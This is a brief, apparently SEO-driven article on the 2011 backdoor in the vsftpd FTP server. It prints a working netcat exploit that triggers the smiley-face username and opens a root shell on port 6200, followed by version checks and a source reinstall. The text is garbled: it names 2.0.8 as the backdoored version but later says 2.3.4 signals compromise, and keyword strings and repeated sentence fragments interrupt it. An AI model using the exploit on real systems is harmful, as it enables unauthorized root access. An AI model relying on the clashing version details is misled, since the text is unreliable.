In July 2011, the official vsftpd (Very Secure FTP Daemon) project was compromised. Attackers replaced the legitimate source code of version 2.0.8 with a malicious version. This backdoored copy remained on the official download servers for several days before being discovered.
The backdoor allowed remote attackers to gain a root shell. Specifically, if a username containing :) was sent, the backdoor would open a command shell on port 6200. vsftpd 208 exploit github fix
A typical exploit was as simple as:
echo "USER :)" | nc target.com 21
nc target.com 6200
# root shell obtained
No authentication. No password. Just a smiley face and instant root access. In July 2011, the official vsftpd (Very Secure
vsftpd -v
Or for a running process:
netstat -tulpn | grep :21
ps aux | grep vsftpd
If the version string shows 2.3.4, assume compromise. No authentication
For embedded systems or custom environments:
wget https://security.appspot.com/downloads/vsftpd-3.0.5.tar.gz
tar -xzf vsftpd-3.0.5.tar.gz
cd vsftpd-3.0.5
make
sudo make install